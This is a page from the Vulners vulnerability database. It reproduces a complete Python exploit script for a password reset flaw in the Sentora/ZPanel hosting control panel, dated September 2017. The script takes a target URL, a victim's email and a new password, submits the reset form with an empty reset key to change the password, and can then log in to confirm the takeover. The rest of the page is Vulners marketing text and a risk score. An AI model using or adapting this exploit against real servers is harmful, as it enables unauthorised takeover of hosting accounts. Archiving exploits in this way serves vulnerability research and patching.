Vulners
Lucene search
Sentora / ZPanel Password Reset Vulnerability
#!/usr/bin/env python3
# pylint: disable=C0103
#
# requires requests and lxml library
# pip3 install requests lxml
#
import sys
from urllib.parse import urljoin
import lxml.html
import requests
try:
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
except:
pass
if len(sys.argv) < 4:
print("")
print("usage:")
print("%s http://target/ email newpassword [username]" % sys.argv[0])
print("")
print("If username is specified then login will be attempted to verify password change.")
print("")
sys.exit()
TARGET = sys.argv[1]
USER_EMAIL = sys.argv[2]
USER_NEWPASS = sys.argv[3]
USER_NAME = sys.argv[4] if len(sys.argv) > 4 else ""
def get_form(getpath, formname, params=None):
resp = session.get(urljoin(TARGET, getpath), params=params)
tree = lxml.html.fromstring(resp.content)
form = tree.xpath('//form[@name="%s"]' % formname)
if not form:
return None
form = form[0]
formdata = {}
for element in form.xpath('.//input'):
formdata[element.name] = element.value if element.value else ""
return (form.action, formdata)
def post_form(formaction, data, params=None):
return session.post(urljoin(TARGET, formaction), params=params, data=data, allow_redirects=False)
session = requests.Session()
session.verify = False
print("Get reset form")
form = get_form("/", "frmZConfirm", {"resetkey": "dummy"})
print("Reset password")
formaction, formdata = form
formdata["inConfEmail"] = USER_EMAIL
formdata["inNewPass"] = formdata["inputNewPass2"] = USER_NEWPASS
resp = post_form(formaction, formdata, {"resetkey": ""})
if USER_NAME:
#session.cookies.clear()
print("Test login")
print("Get login form")
form = get_form("/", "frmZLogin")
print("Login")
formaction, formdata = form
formdata["inUsername"] = USER_NAME
formdata["inPassword"] = USER_NEWPASS
resp = post_form(formaction, formdata)
if "invalidlogin" in resp.headers.get("location", ""):
print("Failed!")
sys.exit()
print("OK")
session.get(urljoin(TARGET, "/?logout"))
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Sep 2017 00:00Current
6.8Medium risk
Vulners AI Score6.8